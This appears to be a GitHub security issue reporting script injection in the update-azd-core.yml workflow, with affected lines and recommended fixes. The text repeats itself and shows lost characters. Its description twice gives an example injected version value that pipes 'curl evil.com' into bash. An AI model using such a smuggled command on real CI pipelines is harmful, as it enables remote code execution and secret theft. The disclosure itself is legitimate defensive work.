You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository was archived by the owner on May 18, 2026. It is now read-only.
The update-azd-core.yml workflow uses
epository_dispatch event payloads directly in GitHub Actions expression contexts (${{ }}), which are evaluated before the shell runs. Because any repository with a valid PAT can trigger
epository_dispatch, the client_payload.version and client_payload.branch fields are attacker-controlled.
The version validation on line 59 (^v) is insufficient — a value like �1" && curl evil.com | bash && echo " would pass the check and execute arbitrary commands in subsequent
un: blocks (lines 74, 82, 94–95, 100, 110, 118–120).
Affected Files
File
Lines
.github/workflows/update-azd-core.yml
41–43, 52, 74, 82, 94–95, 100, 110, 118–120
Recommended Fix
Store dispatch payload values in environment variables and reference them as shell variables instead of inline ${{ }} expressions
Strengthen version validation to require strict semver: ^v[0-9]+.[0-9]+.[0-9]+(-[a-zA-Z0-9.]+)?$
Validate the branch name against a strict alphanumeric/dash pattern
Vulnerability: Script Injection via repository_dispatch Payload
CWE: CWE-77 — Command Injection
Severity: High
Description
The update-azd-core.yml workflow uses
epository_dispatch event payloads directly in GitHub Actions expression contexts (${{ }}), which are evaluated before the shell runs. Because any repository with a valid PAT can trigger
epository_dispatch, the client_payload.version and client_payload.branch fields are attacker-controlled.
The version validation on line 59 (^v) is insufficient — a value like �1" && curl evil.com | bash && echo " would pass the check and execute arbitrary commands in subsequent
un: blocks (lines 74, 82, 94–95, 100, 110, 118–120).
Affected Files
Recommended Fix
References